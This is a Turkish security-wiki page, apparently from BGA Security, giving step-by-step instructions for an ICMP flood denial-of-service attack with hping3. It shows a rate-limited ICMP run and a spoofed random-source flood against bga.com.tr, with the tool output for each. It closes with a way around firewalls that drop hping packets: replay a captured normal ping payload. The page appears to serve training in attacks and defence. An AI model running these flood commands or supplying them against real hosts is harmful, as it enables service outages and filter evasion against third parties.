ICMP Flood DDoS Saldırısı Gerçekleştirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Hedef sunucuya yoğun şekilde ICMP isteği gönderilerek hedefin servis dışı bırakılması

Araçlar:

  • Hping
  • Wireshark
  • Tcpdump

Hping ile ilk olarak gerçek IP adresimizden hedef IP sunucuya 1 saniyede 10 ICMP isteği yapmak için aşağıdaki gibi bir komut kullanılır. Çıktı incelendiğinde cevapların bizim IP adresimize döndüğü gözlemlenecektir.

root@bgakali#  hping3 --icmp bga.com.tr -i u1000

HPING bga.com.tr (eth0 50.22.202.163): icmp mode set, 28 headers + 0 data bytes
len=46 ip=50.22.202.163 ttl=53 id=20108 icmp_seq=1 rtt=125.9 ms
len=46 ip=50.22.202.163 ttl=53 id=20109 icmp_seq=2 rtt=125.9 ms
len=46 ip=50.22.202.163 ttl=53 id=20067 icmp_seq=0 rtt=129.2 ms
len=46 ip=50.22.202.163 ttl=53 id=20878 icmp_seq=6 rtt=126.2 ms
len=46 ip=50.22.202.163 ttl=53 id=20993 icmp_seq=7 rtt=126.0 ms
len=46 ip=50.22.202.163 ttl=53 id=20250 icmp_seq=3 rtt=132.4 ms
len=46 ip=50.22.202.163 ttl=53 id=20511 icmp_seq=4 rtt=132.2 ms
len=46 ip=50.22.202.163 ttl=53 id=21775 icmp_seq=11 rtt=125.5 ms
len=46 ip=50.22.202.163 ttl=53 id=20767 icmp_seq=5 rtt=132.2 ms
len=46 ip=50.22.202.163 ttl=53 id=21546 icmp_seq=9 rtt=129.2 ms
len=46 ip=50.22.202.163 ttl=53 id=21249 icmp_seq=8 rtt=132.2 ms
len=46 ip=50.22.202.163 ttl=53 id=21717 icmp_seq=10 rtt=131.9 ms
len=46 ip=50.22.202.163 ttl=53 id=22925 icmp_seq=16 rtt=126.3 ms
len=46 ip=50.22.202.163 ttl=53 id=23152 icmp_seq=17 rtt=126.2 ms
len=46 ip=50.22.202.163 ttl=53 id=22066 icmp_seq=12 rtt=131.9 ms
len=46 ip=50.22.202.163 ttl=53 id=22622 icmp_seq=15 rtt=129.0 ms
len=46 ip=50.22.202.163 ttl=53 id=22369 icmp_seq=13 rtt=132.2 ms
len=46 ip=50.22.202.163 ttl=53 id=22615 icmp_seq=14 rtt=133.0 ms
len=46 ip=50.22.202.163 ttl=53 id=23461 icmp_seq=18 rtt=129.4 ms
len=46 ip=50.22.202.163 ttl=53 id=23929 icmp_seq=22 rtt=126.0 ms
len=46 ip=50.22.202.163 ttl=53 id=23939 icmp_seq=23 rtt=126.1 ms
len=46 ip=50.22.202.163 ttl=53 id=23800 icmp_seq=21 rtt=129.1 ms
len=46 ip=50.22.202.163 ttl=53 id=24031 icmp_seq=24 rtt=126.5 ms
len=46 ip=50.22.202.163 ttl=53 id=23626 icmp_seq=19 rtt=132.1 ms

Hping ile rastgele IP adreslerinden “bga.com.tr” sunucusuna ICMP Flood saldırısı gerçekleştirmek için ise aşağıdaki gibi bir komut kullanılabilir.

root@kali:~# hping3 --icmp bga.com.tr --flood --rand-source
HPING bga.com.tr (eth1 50.22.202.162): icmp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown
--- bga.com.tr hping statistic ---
97418 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Bazı sistemler hping tarafından üretilen ICMP paketlerini tanır ve yakalanan isteği sunucuya göndermeden otomatik olarak siler. Bunu atlatmak için normal bir ping komutu ile normal bir ICMP isteği gerçekleştirilip wireshark ile bu talep binary olarak kaydedilip data olarak hping’ e verilerek ilgili güvenlik duvarı atlatılarak ICMP Flood saldırısı yapılabilir.